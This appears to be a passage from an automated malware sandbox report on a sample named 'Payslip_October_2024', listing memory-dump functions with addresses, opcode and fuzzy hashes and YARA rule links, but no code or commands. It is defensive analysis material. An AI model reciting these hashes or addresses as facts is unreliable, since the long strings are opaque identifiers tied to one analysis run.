                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37baa73257a3dbacf046bfa96144cf6be4f4755db7104e977a03ac5eac64ea2b
                                                                                                            • Instruction ID: b45b6de10891d09c62a4ca4ac9d2ecdaef34cb5cf67f5b644c2f63615ed76cc7
                                                                                                            • Opcode Fuzzy Hash: 37baa73257a3dbacf046bfa96144cf6be4f4755db7104e977a03ac5eac64ea2b
                                                                                                            • Instruction Fuzzy Hash: 4321FF34B002159FDB04EB78D964B6F77EAEB88314F204428E509D7B85EF35AD42C7A1
                                                                                                            Function 04FB4A04 Relevance: .1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9e4c4d94f450837a0d99f4304e19436b9c0101b8705fe80ebdd7b7a060e88057
                                                                                                            • Instruction ID: ece2602054ca5f5db8d7b1eefbf71d34d09c6ff309c89b48bbf6b27e364e7381
                                                                                                            • Opcode Fuzzy Hash: 9e4c4d94f450837a0d99f4304e19436b9c0101b8705fe80ebdd7b7a060e88057
                                                                                                            • Instruction Fuzzy Hash: E531F4B0D01218DFDB10DF9AC585BCEBBF5AB49314F24801AE444B7351C7B5A946CF95
                                                                                                            Function 00BED1F8 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37d779ebb3dd1623938b2a255c133513c4f5853cd23b5ef791332c51d3c06dc5
                                                                                                            • Instruction ID: 97a145efdbda3e6f2680e00380f794b2014f3958381661af74c7a01e596bda22
                                                                                                            • Opcode Fuzzy Hash: 37d779ebb3dd1623938b2a255c133513c4f5853cd23b5ef791332c51d3c06dc5
                                                                                                            • Instruction Fuzzy Hash: AC213BB1504284DFDB11DF15D9C4B26BBE5FB94324F24C6ADD9090B345C3B6D806DA61
                                                                                                            Function 00BED3A8 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b3daacf817c5e4d3bd2e9ef45c810b67625a224d88fd446fcb079c5a60062e1c
                                                                                                            • Instruction ID: 37e76e31be8d57731befca69bcb9faf29448d9597380e2022aedf2333eb5b034
                                                                                                            • Opcode Fuzzy Hash: b3daacf817c5e4d3bd2e9ef45c810b67625a224d88fd446fcb079c5a60062e1c
                                                                                                            • Instruction Fuzzy Hash: 852125B5604280DFCB04DF15D5C4B25BBB5FBA4314F20C5ADD90A4B392C3B6E806CB62
                                                                                                            Function 00BED030 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a610a5dc0c778f757029fe871a6350b74e69daf5515e5fca6dfc663e9225b362
                                                                                                            • Instruction ID: cc860fb2bbd33bd7b2b1b3fc070ec13985cbca769bf954ca2a25497df1b607f2
                                                                                                            • Opcode Fuzzy Hash: a610a5dc0c778f757029fe871a6350b74e69daf5515e5fca6dfc663e9225b362
                                                                                                            • Instruction Fuzzy Hash: 9D212571604280DFCB10DF14D9D0B26BBE5FB84314F28C6ADD80A4B392C3B6D807CA62
                                                                                                            Function 0662B030 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee51ad217b839d28c3fc9d47c6c47deeaea783e46bce87cc52ae04b418ebcbd2
                                                                                                            • Instruction ID: 5ab62e65ad71768bfe06dfec744c7c4339d14c4d2430f992462b633e548deda6
                                                                                                            • Opcode Fuzzy Hash: ee51ad217b839d28c3fc9d47c6c47deeaea783e46bce87cc52ae04b418ebcbd2
                                                                                                            • Instruction Fuzzy Hash: A0215071D10B2A8BDF65CFA9C44069EBBB1FF85314F14892AE805EB340E770A945CF81
                                                                                                            Function 00BED118 Relevance: .1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 023868730c8050a22738f0bb5f87c98c87e75772e390d95740429b4e001d6a11
                                                                                                            • Instruction ID: 6193ad85062936efeeca4d660e9e8b5f0172974f0483f8be64f29abf2ff16f6a
                                                                                                            • Opcode Fuzzy Hash: 023868730c8050a22738f0bb5f87c98c87e75772e390d95740429b4e001d6a11
                                                                                                            • Instruction Fuzzy Hash: 782101B1604380DFDB04DF15C9C4B26BBE6FB94318F20C6ADE80A5B391C37AD846C662
                                                                                                            Function 04FB1050 Relevance: .1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dba27ecfc7853ab381523a248c6a6316fd933293f7905f03ec5f69efcda425f6
                                                                                                            • Instruction ID: 6226f1983359ec84ae83425eda6e0e764f6364566469bc84a95686f531591d79
                                                                                                            • Opcode Fuzzy Hash: dba27ecfc7853ab381523a248c6a6316fd933293f7905f03ec5f69efcda425f6
                                                                                                            • Instruction Fuzzy Hash: 18212C32E042095FCB04EFB5EC055DFBBB6EFC6314B04C466D505EB242EA306905CB90
                                                                                                            Function 04FB43EC Relevance: .1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8367a2de12427b9b61aded677bf74312c84a85e9070c80c5c62ca54007cbbd1
                                                                                                            • Instruction ID: cd0a16bb7e54c24bbfb50817a039afcb02a12f3fefb512385a430612c49c3968
                                                                                                            • Opcode Fuzzy Hash: d8367a2de12427b9b61aded677bf74312c84a85e9070c80c5c62ca54007cbbd1
                                                                                                            • Instruction Fuzzy Hash: E631E2B0D00218DFDB10DF9ACA89BDEBBF9AB49314F24801AE545B7341C7B5A845CBA5
                                                                                                            Function 04FB28A8 Relevance: .1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 430b0fa3bbf7012df3df330bb6d2229cb9f700573bb439647cf9ccdd4c136188
                                                                                                            • Instruction ID: 9bfa4cc6457ff9a794740f7701f22e61ea1e2ac3a900df4ca525f75f0d496096
                                                                                                            • Opcode Fuzzy Hash: 430b0fa3bbf7012df3df330bb6d2229cb9f700573bb439647cf9ccdd4c136188
                                                                                                            • Instruction Fuzzy Hash: 441103B47003118FD316AF39D49469AB7E6FB85345720897DD15A8B385DF32AD07CB90
                                                                                                            Function 04FB1C54 Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7e53a6e02108e238b5aa715d7643badbb6e7574540123231266a0a1e89eca946
                                                                                                            • Instruction ID: 1f7f0edb5e022724a4640ecd22fe22f49153345303708970a8ebde480f8fd86f
                                                                                                            • Opcode Fuzzy Hash: 7e53a6e02108e238b5aa715d7643badbb6e7574540123231266a0a1e89eca946
                                                                                                            • Instruction Fuzzy Hash: FD2130B0E043488FCB10DFAAD9886CEFFF4EB49310F54842AD459A3200C778A909CFA1
                                                                                                            Function 04FB2D38 Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 623a4bad39506feda64e1eb27359893052e58a7958b9e7b5105a0b540e06819e
                                                                                                            • Instruction ID: db6dd2b56b3ca2981ea901ab8236cab5d936757914fed9f2c807b2bd7d0b5398
                                                                                                            • Opcode Fuzzy Hash: 623a4bad39506feda64e1eb27359893052e58a7958b9e7b5105a0b540e06819e
                                                                                                            • Instruction Fuzzy Hash: 181100666156504FD7128B7A98965E67FE0EF9B21530A41FBD1ACCB3D2DA105807C382
                                                                                                            Function 066240D8 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f78f14b7684c750004954be440a77b621e9038d34cf2293227d0ff33bc7c370
                                                                                                            • Instruction ID: 627b2b08a79cd4d0132b512cf68b6fc59d492e162f466757084988c25c3ad51b
                                                                                                            • Opcode Fuzzy Hash: 0f78f14b7684c750004954be440a77b621e9038d34cf2293227d0ff33bc7c370
                                                                                                            • Instruction Fuzzy Hash: 4011A132F106265FDF949668CC68AAF73EAEBC8314F004139D50AE7344DE25DC428BD2
                                                                                                            Function 04FB28B8 Relevance: .1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a08a25b6ec037d62e849286ea59e7073f3ff4afe5791f38ccac7616824a1e770
                                                                                                            • Instruction ID: 05cb7a43516b55e26399d6b2f9dd1922c4e95e5f287983c85a587fdfdb3f5822
                                                                                                            • Opcode Fuzzy Hash: a08a25b6ec037d62e849286ea59e7073f3ff4afe5791f38ccac7616824a1e770
                                                                                                            • Instruction Fuzzy Hash: 6D11EF707003148FD315AF29D45469BB7E6FB85759B20897DD11A8B388DF32AC06CB90
                                                                                                            Function 04FB1111 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3bcccd8f188b92c434772dbe10ec77f0989a0b3e4f2d17523aa228010e75d6eb
                                                                                                            • Instruction ID: a90b9bae8332d63b4cfd75d4af0d79da825e9729d37be967dae79afdf6ea1493
                                                                                                            • Opcode Fuzzy Hash: 3bcccd8f188b92c434772dbe10ec77f0989a0b3e4f2d17523aa228010e75d6eb
                                                                                                            • Instruction Fuzzy Hash: CC2103B58003499FDB10DF9AC984ADEBBF4FB49324F10842AE959A3311C378A945CFA1
                                                                                                            Function 04FB0BCC Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee4cbc72f176fba362f64dfdfdbddfefc45599f1cec540eef8df974b13d7798e
                                                                                                            • Instruction ID: c97c5d4df590bdddb8d3ab6a3a900ac38d985a8bb306334b50c019878b80197e
                                                                                                            • Opcode Fuzzy Hash: ee4cbc72f176fba362f64dfdfdbddfefc45599f1cec540eef8df974b13d7798e
                                                                                                            • Instruction Fuzzy Hash: 472133B58003499FDB10DF9AC984ADEBBF8FB49310F10801AE958A3301C374A955CFA1
                                                                                                            Function 0662F2B0 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4e03de9a84aa773c69660e8ccdf47cd07f3005c505885a11b02e590eea60644
                                                                                                            • Instruction ID: 682dc245f93a8c997ad8ac49602eada7336e8366ec9800e5dcfa2f80b4730b93
                                                                                                            • Opcode Fuzzy Hash: a4e03de9a84aa773c69660e8ccdf47cd07f3005c505885a11b02e590eea60644
                                                                                                            • Instruction Fuzzy Hash: 4901F131B015610BCB6292B9D854B6E7BEADBCA610B28847BE00AC7342E920DC0347C6
                                                                                                            Function 06624310 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c3d78d57364aee56747ff33b1938f042ffd0cb5e982c01c596be9cb85e04c51
                                                                                                            • Instruction ID: 014dad4150b12e526fe7b4570ea7fe7a6b50f65c42232ea3eb352f68c5f3e17b
                                                                                                            • Opcode Fuzzy Hash: 0c3d78d57364aee56747ff33b1938f042ffd0cb5e982c01c596be9cb85e04c51
                                                                                                            • Instruction Fuzzy Hash: 1A01DF32B105211BDB64956EE81076FB6DAEBC9711F28883AF10EC7741EE65DC028795
                                                                                                            Function 04FB3EC8 Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9625855bca597698eddba6c39091ab871032b1498ac4ec71a78a3ff01dfcd29e
                                                                                                            • Instruction ID: 68ef376c71ef83aaa39ae2239c1d189e6f2d6ced640f721b04a8057adb128f68
                                                                                                            • Opcode Fuzzy Hash: 9625855bca597698eddba6c39091ab871032b1498ac4ec71a78a3ff01dfcd29e
                                                                                                            • Instruction Fuzzy Hash: 66112631A093489FCB028FA4D8559D9BFB2FF46304B0580E6E9949F262D731981BCB91
                                                                                                            Function 06623D92 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 91ab6f5179d2f5e25b57553fd774a0ae1755d58d108a28ff52025ddcf5cd3ec7
                                                                                                            • Instruction ID: a1d32539b3353c87aaee94a24091bdcfd1ec24a60a40cd58583966fd21fbfac8
                                                                                                            • Opcode Fuzzy Hash: 91ab6f5179d2f5e25b57553fd774a0ae1755d58d108a28ff52025ddcf5cd3ec7
                                                                                                            • Instruction Fuzzy Hash: 6221C3B1D012599FCB00DF9AD985ADEFBB4FB48314F10811AE518B7340C374A954CFA5
                                                                                                            Function 00BED1F3 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                            • Instruction ID: c20d5ae4470de49f84e8ebb39cd2740f8275bdd78241b0f3745806341a91b094
                                                                                                            • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                            • Instruction Fuzzy Hash: 2111C176504284CFDB12CF14D5C4B19FFB1FB84324F24C6AAD9494B656C37AD80ACBA2
                                                                                                            Function 00BED3A3 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: 0ee4c982f9f8f11a83f90e9f41958bb519d93785d5509de9fbd65ddddae470b2
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: 3611DDB5504280CFCB01CF10D5C4B15BBB2FB94324F24C6AED9494B3A6C37AE84ACB62
                                                                                                            Function 0662A418 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5aab182b4a43500fda3a69ccc29cc43c50d87309b4295434360f83abf86f051
                                                                                                            • Instruction ID: a163039202cb68bc7aafcf76618c43b06ff839333b5a00d8877b50a8dff2f3bc
                                                                                                            • Opcode Fuzzy Hash: e5aab182b4a43500fda3a69ccc29cc43c50d87309b4295434360f83abf86f051
                                                                                                            • Instruction Fuzzy Hash: F1014231F005221FCB60EABCD85872B77D6DB89328F58843AE40EC7751EE62DC428B81
                                                                                                            Function 00BED113 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2bba1b886c7af03120d174dc7deae98a13e2b30171c5fb19a59aa5d286d4f618
                                                                                                            • Instruction ID: 28685b6acaac4450dbd99b8552fb3a5cae50af93a7e2e015534ffbcbfef9265a
                                                                                                            • Opcode Fuzzy Hash: 2bba1b886c7af03120d174dc7deae98a13e2b30171c5fb19a59aa5d286d4f618
                                                                                                            • Instruction Fuzzy Hash: 9A11BF75504284CFDB05CF14D9C4B15BFB2FB94318F24C6ADD8494B696C37AD84ACB52
                                                                                                            Function 04FB0C2C Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 514acf4e490159cad8e67eb88d39e8879a679256f3a84935432ae66212a2a5d0
                                                                                                            • Instruction ID: e32b5ecaaaae6faccd81a8c337ebcbf012098ab59d8a0f343e1e8b98265256f4
                                                                                                            • Opcode Fuzzy Hash: 514acf4e490159cad8e67eb88d39e8879a679256f3a84935432ae66212a2a5d0
                                                                                                            • Instruction Fuzzy Hash: 5111DDB1D043189FDB10DF9AD988ADEFBF4FB49314F10842AE558B3210D778A9058BA5
                                                                                                            Function 06623D98 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ee697d82848b1d4ad4b18ed4597c0a1a3727a385d4783d6e577261fdc993d5c
                                                                                                            • Instruction ID: 01a72f6dcb882f08816db5ac634f41dc1d86af31dc64b65ef654b204ad7f533d
                                                                                                            • Opcode Fuzzy Hash: 3ee697d82848b1d4ad4b18ed4597c0a1a3727a385d4783d6e577261fdc993d5c
                                                                                                            • Instruction Fuzzy Hash: 5111CEB1D01259AFCB00DF9AD984A8EFBB4FB48314F10812AE918A7340C378A954CFA5
                                                                                                            Function 06624320 Relevance: .1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1624d7f3725dfede863ee13205b7065c9353b557091c30f66ae718ca077ba53f
                                                                                                            • Instruction ID: e04caa3e922fe869363d0767083133c1ffabe178d4387fdfe0241d2ebb88bb33
                                                                                                            • Opcode Fuzzy Hash: 1624d7f3725dfede863ee13205b7065c9353b557091c30f66ae718ca077ba53f
                                                                                                            • Instruction Fuzzy Hash: F901D131B105210BDB64957EE41476FB3DAEBC9710F24883AF10EC7741EE65DC024785
                                                                                                            Function 066240C9 Relevance: .0, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f4d69e4c9ad34dedce4bb4fb5b15eafbe53c1bcd38ff317f2dc3bf4c01a8a7e
                                                                                                            • Instruction ID: 754bb8a993ebac32f31036f593f34630b2344b01da02e8d92f02f79c3faff4d1
                                                                                                            • Opcode Fuzzy Hash: 0f4d69e4c9ad34dedce4bb4fb5b15eafbe53c1bcd38ff317f2dc3bf4c01a8a7e
                                                                                                            • Instruction Fuzzy Hash: 15018B36F105365BEB949668DC687AF72EA9BC8314F05413AD50AE3384EE608C528BD2
                                                                                                            Function 04FB3E60 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d824bd1d0aa2bb84df276e0c4c13ff2cfe0c934414868dc9d725a0fb248b7514
                                                                                                            • Instruction ID: bdd4c2480a6eac570ade9c58e2944ae4e85bfc8e7701de413fa98a08f18e747e
                                                                                                            • Opcode Fuzzy Hash: d824bd1d0aa2bb84df276e0c4c13ff2cfe0c934414868dc9d725a0fb248b7514
                                                                                                            • Instruction Fuzzy Hash: 7F01DFB5E4A7445FCB228FB498414DABFF1EF4A20070A859FD485C7543C634990AC791
                                                                                                            Function 0662F2C0 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
